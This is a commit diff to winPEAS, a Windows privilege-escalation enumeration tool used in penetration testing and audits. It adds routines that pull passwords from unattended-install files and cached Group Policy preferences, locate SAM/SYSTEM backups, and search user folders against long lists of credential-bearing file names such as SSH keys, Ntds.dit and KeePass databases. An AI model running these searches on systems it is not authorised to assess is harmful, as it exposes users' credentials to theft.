static string patterns_file_creds_color = "RDCMan.settings|.rdg|_history|.sudo_as_admin_successful|.profile|bashrc|httpd.conf|.plan|.htpasswd|.git-credentials|.rhosts|hosts.equiv|Dockerfile|docker-compose.yml|credentials|credentials.db|access_tokens.db|accessTokens.json|legacy_credentials|azureProfile.json|appcmd.exe|scclient.exe|unattend.txt|access.log|error.log|credential|password|.gpg|.pgp|config.php|elasticsearch|kibana.|.p12|.der|.csr|.crt|.cer|.pem|known_hosts|id_rsa|id_dsa|.ovpn|anaconda-ks.cfg|hostapd.conf|rsyncd.conf|cesi.conf|supervisord.conf|tomcat-users.xml|web.config|.kdbx|.key|KeePass.config|ntds.dir|Ntds.dit|sam|system|SAM|SYSTEM|FreeSSHDservice.ini|sysprep.inf|sysprep.xml|unattend.xml|unattended.xml|vnc|groups.xml|services.xml|scheduledtasks.xml|printers.xml|drives.xml|datasources.xml|php.ini|https.conf|https-xampp.conf|httpd.conf|my.ini|my.cnf|access.log|error.log|server.xml|SiteList.xml|setupinfo";
static string patterns_file_creds = @"RDCMan.settings;*.rdg;*_history*;httpd.conf;.htpasswd;.gitconfig;.git-credentials;Dockerfile;docker-compose.yml;access_tokens.db;accessTokens.json;azureProfile.json;appcmd.exe;scclient.exe;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.cer$;known_hosts;*id_rsa*;*id_dsa*;*.ovpn;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;php.ini;https.conf;https-xampp.conf;my.ini;my.cnf;access.log;error.log;server.xml;ConsoleHost_history.txt";
static string complete_patterns_file_creds = ";unattend.txt;*.der$;*.csr$;unattend.xml;unattended.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;setupinfo;setupinfo.bak";
static string patterns_file_creds_color = @"RDCMan.settings|.rdg|_history|httpd.conf|.htpasswd|.gitconfig|.git-credentials|Dockerfile|docker-compose.ymlaccess_tokens.db|accessTokens.json|azureProfile.json|appcmd.exe|scclient.exe|unattend.txt|access.log|error.log|credential|password|.gpg|.pgp|config.php|elasticsearch|kibana.|.p12|\.der|.csr|.crt|.cer|.pem|known_hosts|id_rsa|id_dsa|.ovpn|tomcat-users.xml|web.config|.kdbx|.key|KeePass.config|ntds.dir|Ntds.dit|sam|system|SAM|SYSTEM|FreeSSHDservice.ini|sysprep.inf|sysprep.xml|unattend.xml|unattended.xml|vnc|groups.xml|services.xml|scheduledtasks.xml|printers.xml|drives.xml|datasources.xml|php.ini|https.conf|https-xampp.conf|my.ini|my.cnf|access.log|error.log|server.xml|setupinfo";
// Create Dynamic blacklists
static string currentUserName = Environment.UserName;
@ -144,7 +144,7 @@ namespace winPEAS
try
{
if (MyUtils.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && MyUtils.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1'");
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
}
catch(Exception ex)
{
@ -189,7 +189,7 @@ namespace winPEAS
{
Beaprint.MainPrint("PowerShell Settings", "");
Dictionary<string, string> PSs = SystemInfo.GetPowerShellSettings();
Beaprint.DictPrint(PSs, true);
Beaprint.DictPrint(PSs, false);
}
catch (Exception ex)
{
@ -232,7 +232,7 @@ namespace winPEAS
try
{
Beaprint.MainPrint("LAPS Settings", "T1012");
Beaprint.LinkPrint("", "If installed, local administrator password change frequently in domain-joined boxes and is restricted by ACL");
Beaprint.LinkPrint("", "If installed, local administrator password is changed frequently and is restricted by ACL");
Dictionary<string, string> lapsDict = SystemInfo.GetLapsSettings();
Dictionary<string, string> colorsSI = new Dictionary<string, string>()
{
@ -246,6 +246,62 @@ namespace winPEAS
}
}
void PrintWdigest()
{
Beaprint.MainPrint("Wdigest", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest", "If enabled, plain-text crds could be stored in LSASS");
string useLogonCredential = MyUtils.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest", "UseLogonCredential");
if (useLogonCredential == "1")
Beaprint.BadPrint(" Wdigest is active");
else
Beaprint.GoodPrint(" Wdigest is not enabled");
}
void PrintLSAProtection()
{
Beaprint.MainPrint("LSA Protection", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection", "If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key)");
string useLogonCredential = MyUtils.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\LSA", "RunAsPPL");
if (useLogonCredential == "1")
Beaprint.GoodPrint(" LSA Protection is active");
else
Beaprint.BadPrint(" LSA Protection is not enabled");
}
void PrintCredentialGuard()
{
Beaprint.MainPrint("Credentials Guard", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard", "If enabled, a driver is needed to read LSASS memory");
string lsaCfgFlags = MyUtils.GetRegValue("HKLM", @"System\CurrentControlSet\Control\LSA", "LsaCfgFlags");
if (lsaCfgFlags == "1")
{
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
Beaprint.GoodPrint(" CredentialGuard is active with UEFI lock");
}
else if (lsaCfgFlags == "2")
{
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
Beaprint.GoodPrint(" CredentialGuard is active without UEFI lock");
}
else
Beaprint.BadPrint(" CredentialGuard is not enabled");
}
void PrintCachedCreds()
{
Beaprint.MainPrint("Cached Creds", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = MyUtils.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
if (!String.IsNullOrEmpty(cachedlogonscount))
{
int clc = Int16.Parse(cachedlogonscount);
if (clc > 0)
Beaprint.BadPrint(" cachedlogonscount is "+ cachedlogonscount);
else
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
}
void PrintUserEV()
{
try
@ -401,6 +457,10 @@ namespace winPEAS
PrintAuditInfo();
PrintWEFInfo();
PrintLAPSInfo();
PrintWdigest();
PrintLSAProtection();
PrintCredentialGuard();
PrintCachedCreds();
PrintUserEV();
PrintSystemEV();
PrintInetInfo();
@ -577,7 +637,7 @@ namespace winPEAS
{
if (!ban)
{
Beaprint.BadPrint("Some AutoLogon credentials were found!!");
Beaprint.BadPrint(" Some AutoLogon credentials were found!!");
ban = true;
}
Beaprint.AnsiPrint(String.Format(" {0,-30}: {1}", entry.Key, entry.Value), colorsU());
@ -740,7 +800,7 @@ namespace winPEAS
try
{
Beaprint.MainPrint("Interesting Services -non Microsoft-", "T1007");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services", "Check if you can overwrite some service binary or perform a DLL hijacking, also cehck for unquoted paths");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services", "Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths");
List<Dictionary<string, string>> services_info = ServicesInfo.GetNonstandardServices();
@ -774,7 +834,12 @@ namespace winPEAS
if (no_quotes_and_space)
formString += " - {7}";
if (mod_services.ContainsKey(service_info["Name"]))
formString += "\n YOU CAN MODIFY THIS SERVICE: "+ mod_services[service_info["Name"]];
{
if (mod_services[service_info["Name"]] == "Start")
formString += "\n You can START this service";
else
formString += "\n YOU CAN MODIFY THIS SERVICE: " + mod_services[service_info["Name"]];
}
if (file_rights.Count > 0)
formString += "\n File Permissions: {8}";
if (dir_rights.Count > 0)
@ -789,6 +854,7 @@ namespace winPEAS
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
{ "No quotes and Space detected", Beaprint.ansi_color_bad },
{ "YOU CAN MODIFY THIS SERVICE:.*", Beaprint.ansi_color_bad },
{ " START ", Beaprint.ansi_color_bad },
{ service_info["PathName"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+"), (file_rights.Count > 0 || dir_rights.Count > 0 || no_quotes_and_space) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
};
@ -926,9 +992,9 @@ namespace winPEAS
{
try
{
Beaprint.MainPrint("Installed Applications --Via Program Files--", "T1083&T1012&T1010&T1518");
Beaprint.MainPrint("Installed Applications --Via Program Files/Uninstall registry--", "T1083&T1012&T1010&T1518");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software", "Check if you can modify installed software");
Dictionary<string, Dictionary<string, string>> InstalledAppsPerms = ApplicationInfo.GetInstalledAppsPerms();
SortedDictionary<string, Dictionary<string, string>> InstalledAppsPerms = ApplicationInfo.GetInstalledAppsPerms();
string format = " ==> {0} ({1})";
foreach (KeyValuePair<string, Dictionary<string, string>> app in InstalledAppsPerms)
{
@ -957,13 +1023,13 @@ namespace winPEAS
}
System.Console.WriteLine();
Beaprint.MainPrint("Installed Applications --Via Registry--", "T1083&T1012&T1010");
/*Beaprint.MainPrint("Installed Applications --Via Registry--", "T1083&T1012&T1010");
Dictionary<string, string> colorsA = new Dictionary<string, string>()
{
{ goodSoft, Beaprint.ansi_color_good }
};
Beaprint.ListPrint(ApplicationInfo.GetAppsRegistry(), colorsA);
Beaprint.ListPrint(ApplicationInfo.GetAppsRegistry(), colorsA);*/
}
catch
{
@ -1163,7 +1229,11 @@ namespace winPEAS
foreach (List<string> conn in conns)
{
if (conn[0].Contains("UDP") && conn[1].Contains("0.0.0.0:") && (conn[1].Split(':')[1].Length > 4))
continue;
continue; //Delete useless UDP listening ports
if (conn[0].Contains("UDP") && conn[1].Contains("[::]:") && (conn[1].Split(']')[1].Length > 4))
continue; //Delete useless UDP listening ports
Beaprint.AnsiPrint(String.Format(" {0,-10}{1,-23}{2,-23}{3}", conn[0], conn[1], conn[2], conn[3]), colorsN);
}
}
@ -1747,7 +1817,7 @@ namespace winPEAS
/////////////////////////////////////////////////
/////////////// INTERESTING FILES ///////////////
/////////////////////////////////////////////////
private static void PrintInterestingFiles(bool is_fast)
private static void PrintInterestingFiles()
{
void PrintPuttySess()
{
@ -1833,12 +1903,89 @@ namespace winPEAS
}
}
void PrintUnattendFiles()
{
try
{
Beaprint.MainPrint("Unnattend Files", "");
//Beaprint.LinkPrint("");
List<string> unattended_files = InterestingFiles.GetUnattendedInstallFiles();
foreach (string path in unattended_files)
{
List<string> pwds = InterestingFiles.ExtractUnattenededPwd(path);
Beaprint.BadPrint(" "+path);
System.Console.WriteLine(String.Join("\n", pwds));
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintSAMBackups()
{
try
{
Beaprint.MainPrint("Looking for common SAM & SYSTEM backups", "");
List<string> sam_files = InterestingFiles.GetSAMBackups();
foreach (string path in sam_files)
Beaprint.BadPrint(" " + path);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintMcAffeSitelistFiles()
{
try
{
Beaprint.MainPrint("Looking for McAfee Sitelist.xml Files", "");
List<string> sam_files = InterestingFiles.GetMcAfeeSitelistFiles();
foreach (string path in sam_files)
Beaprint.BadPrint(" " + path);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintCachedGPPPassword()
{
try
{
Beaprint.MainPrint("Cached GPP Passwords", "");
Dictionary<string, Dictionary<string, string>> gpp_passwords = InterestingFiles.GetCachedGPPPassword();
Dictionary<string, string> gppColors = new Dictionary<string, string>()
{
{ "cpassword.*", Beaprint.ansi_color_bad },
};
foreach (KeyValuePair<string, Dictionary<string, string>> entry in gpp_passwords)
{
Beaprint.BadPrint(" Found "+ entry.Key);
Beaprint.DictPrint(entry.Value, gppColors, true);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintPossCredsRegs()
{
try
{
string[] pass_reg_hkcu = new string[] { @"Software\ORL\WinVNC3\Password", @"Software\TightVNC\Server", @"Software\SimonTatham\PuTTY\Sessions" };
string[] pass_reg_hklm = new string[] { @"SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon", @"SYSTEM\CurrentControlSet\Services\SNMP" };
string[] pass_reg_hklm = new string[] { @"SYSTEM\CurrentControlSet\Services\SNMP" };
Beaprint.MainPrint("Looking for possible regs with creds", "T1012&T1214");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry");
@ -1931,7 +2078,7 @@ namespace winPEAS
}
}
void PrintPossCredsFiles()
void PrintUsersInterestingFiles()
{
try
{
@ -1940,9 +2087,9 @@ namespace winPEAS
{ patterns_file_creds_color, Beaprint.ansi_color_bad },
};
Beaprint.MainPrint("Looking for possible known files that can contain creds", "T1083&T1081");
Beaprint.MainPrint("Searching known files that can contain creds in home", "T1083&T1081");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files");
string searchPath = String.Format("{0}\\", Environment.GetEnvironmentVariable("SystemDrive"));
string searchPath = Environment.GetEnvironmentVariable("USERPROFILE");
MyUtils.FindFiles(searchPath, patterns_file_creds, colorF);
}
catch (Exception ex)
@ -1971,9 +2118,18 @@ namespace winPEAS
{
Beaprint.MainPrint("Recent files --limit 70--", "T1083&T1081");
List<Dictionary<string, string>> rec_files = KnownFileCredsInfo.GetRecentFiles();
Dictionary<string, string> colorF = new Dictionary<string, string>()
{
{ patterns_file_creds_color, Beaprint.ansi_color_bad },
};
if (rec_files.Count != 0)
Beaprint.DictPrint(rec_files.GetRange(0, rec_files.Count <= 70 ? rec_files.Count : 70), false);
{
foreach (Dictionary<string, string> rec_f in rec_files.GetRange(0, rec_files.Count <= 70 ? rec_files.Count : 70))
Beaprint.AnsiPrint(" " + rec_f["Target"] + "(" + rec_f["Accessed"] + ")", colorF);
}
else
Beaprint.NotFoundPrint();
}
@ -1989,15 +2145,16 @@ namespace winPEAS
PrintPuttySSH();
PrintSSHKeysReg();
PrintCloudCreds();
PrintUnattendFiles();
PrintSAMBackups();
PrintMcAffeSitelistFiles();
PrintCachedGPPPassword();
PrintPossCredsRegs();
PrintUserCredsFiles();
PrintRecycleBin();
if (!is_fast)
{
PrintPossCredsFiles();
PrintUsersDocsKeys();
}
PrintRecentFiles();
PrintUsersInterestingFiles();
PrintUsersDocsKeys();
PrintRecentFiles();
}
@ -2021,9 +2178,6 @@ namespace winPEAS
bool check_if = false;
foreach (string arg in args)
{
if (string.Equals(arg, "fast", StringComparison.CurrentCultureIgnoreCase))
is_fast = true;
if (string.Equals(arg, "cmd", StringComparison.CurrentCultureIgnoreCase))
exec_cmd = true;
@ -2033,6 +2187,9 @@ namespace winPEAS
if (string.Equals(arg, "quiet", StringComparison.CurrentCultureIgnoreCase))
banner = false;
if (string.Equals(arg, "searchall", StringComparison.CurrentCultureIgnoreCase))
patterns_file_creds = patterns_file_creds + complete_patterns_file_creds;
if (string.Equals(arg, "searchfast", StringComparison.CurrentCultureIgnoreCase))
search_fast = false;
@ -2141,7 +2298,7 @@ namespace winPEAS
if (check_bi || check_all)
PrintBrowserInfo();
if (check_if || check_all)
PrintInterestingFiles(is_fast);
PrintInterestingFiles();
/*
* Wifi (passwords?)
@ -2151,7 +2308,7 @@ namespace winPEAS
* List Drivers ==> but how do I know if a driver is malicious?
*/
System.Console.ReadLine(); //For debugging
//System.Console.ReadLine(); //For debugging
}
}
}

16
winPEAS/winPEASexe/winPEAS/ServicesInfo.cs
View File

@ -207,7 +207,7 @@ namespace winPEAS
RawAcl racl = rsd.DiscretionaryAcl;
DiscretionaryAcl dacl = new DiscretionaryAcl(false, false, racl);
string permissions = "";
List<string> permissions = new List<string>();
foreach (System.Security.AccessControl.CommonAce ace in dacl)
{
@ -215,14 +215,18 @@ namespace winPEAS
{
int serviceRights = ace.AccessMask;
string current_perm_str = MyUtils.PermInt2Str(serviceRights, true);
if (!String.IsNullOrEmpty(current_perm_str))
permissions += current_perm_str;
string current_perm_str = MyUtils.PermInt2Str(serviceRights, true, true);
if (!String.IsNullOrEmpty(current_perm_str) && !permissions.Contains(current_perm_str))
permissions.Add(current_perm_str);
}
}
if (!String.IsNullOrEmpty(permissions))
results.Add(sc.ServiceName, permissions);
if (permissions.Count > 0)
{
string perms = String.Join(", ", permissions);
if (perms.Replace("Start", "").Replace("Stop","").Length > 3) //Check if any other permissions appart from Start and Stop
results.Add(sc.ServiceName, perms);
}
}
catch (Exception ex)

9
winPEAS/winPEASexe/winPEAS/SystemInfo.cs
View File

@ -227,6 +227,9 @@ namespace winPEAS
results["Scriptblock Logging Settings"] = "";
Dictionary<string, object> transcriptionSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription");
if ((transcriptionSettings == null) || (transcriptionSettings.Count == 0))
transcriptionSettings = MyUtils.GetRegValues("HKLM", @"HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription");
if ((transcriptionSettings != null) && (transcriptionSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in transcriptionSettings)
@ -236,6 +239,9 @@ namespace winPEAS
}
Dictionary<string, object> moduleLoggingSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging");
if ((moduleLoggingSettings == null) || (moduleLoggingSettings.Count == 0))
moduleLoggingSettings = MyUtils.GetRegValues("HKLM", @"SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging");
if ((moduleLoggingSettings != null) && (moduleLoggingSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in moduleLoggingSettings)
@ -245,6 +251,9 @@ namespace winPEAS
}
Dictionary<string, object> scriptBlockSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging");
if ((scriptBlockSettings == null) || (scriptBlockSettings.Count == 0))
scriptBlockSettings = MyUtils.GetRegValues("HKLM", @"SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging");
if ((scriptBlockSettings != null) && (scriptBlockSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in scriptBlockSettings)

10
winPEAS/winPEASexe/winPEAS/UserInfo.cs
View File

@ -218,7 +218,14 @@ namespace winPEAS
{
if (Buffer != IntPtr.Zero)
{
Marshal.FreeHGlobal(Buffer);
try
{
Marshal.FreeHGlobal(Buffer);
}
catch(Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex));
}
Buffer = IntPtr.Zero;
}
}
@ -396,6 +403,7 @@ namespace winPEAS
{ "S-1-5-21.+-518", "Schema Admins" }, //A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain.
{ "S-1-5-21.+-519", "Enterprise Admins" }, //A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain.
{ "S-1-5-21.+-520", "Group Policy Creator Owners" }, //A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator.
{ "S-1-5-21.+-525", "Protected Users" }, //https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#protected-users
{ "S-1-5-21.+-526", "Key Admins" }, //A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
{ "S-1-5-21.+-527", "Enterprise Key Admins" }, //A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
{ "S-1-5-21.+-553", "RAS and IAS Servers" }, //A domain local group. By default, this group has no members. Servers in this group have Read Account Restrictions and Read Logon Information access to User objects in the Active Directory domain local group.

BIN
winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASany.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASx64.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASx86.exe
View File

Binary file not shown.

25724
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/Map.xml Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/Microsoft.Win32.TaskScheduler.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/de/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/es/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/fr/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/it/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/pl/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/ru/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/winPEAS.pdb Normal file
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/zh-CN/Microsoft.Win32.TaskScheduler.resources.dll Normal file
View File

Binary file not shown.

8
winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscator1.xml
View File

@ -8,19 +8,19 @@
<input>
<loadpaths />
<asmlist>
<inputassembly refid="e530c479-7674-4845-a184-2dc88a7a642f">
<inputassembly refid="ab1132df-ee7b-445f-92fd-fb405cce20f6">
<option>honoroas</option>
<option>stripoa</option>
<option>library</option>
<option>transformxaml</option>
<file dir="D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="Microsoft.Win32.TaskScheduler.dll" />
<file dir="D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="Microsoft.Win32.TaskScheduler.dll" />
</inputassembly>
<inputassembly refid="bf3fde19-95ca-4d0e-b46f-6136ba4e2100">
<inputassembly refid="f33839ff-b6f0-4afa-921f-50f70c620cb7">
<option>honoroas</option>
<option>stripoa</option>
<option>library</option>
<option>transformxaml</option>
<file dir="D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="winPEAS.exe" />
<file dir="D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="winPEAS.exe" />
</inputassembly>
</asmlist>
</input>

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/Release/winPEAS.pdb
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.pdb
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.pdb
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
View File

Binary file not shown.

10
winPEAS/winPEASexe/winPEAS/obj/Debug/winPEAS.csproj.FileListAbsolute.txt
View File

@ -2,8 +2,14 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csprojAssemblyReference.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

1
winPEAS/winPEASexe/winPEAS/obj/Debug/winPEAS.csproj.Fody.CopyLocal.cache
View File

@ -1 +0,0 @@
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\packages\TaskScheduler.2.8.16\lib\net40\Microsoft.Win32.TaskScheduler.xml

BIN
winPEAS/winPEASexe/winPEAS/obj/Debug/winPEAS.csprojAssemblyReference.cache
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/Debug/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/Debug/winPEAS.pdb
View File

Binary file not shown.

9
winPEAS/winPEASexe/winPEAS/obj/Release/winPEAS.csproj.FileListAbsolute.txt
View File

@ -43,7 +43,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csprojAssemblyReference.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.pdb
@ -63,3 +62,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
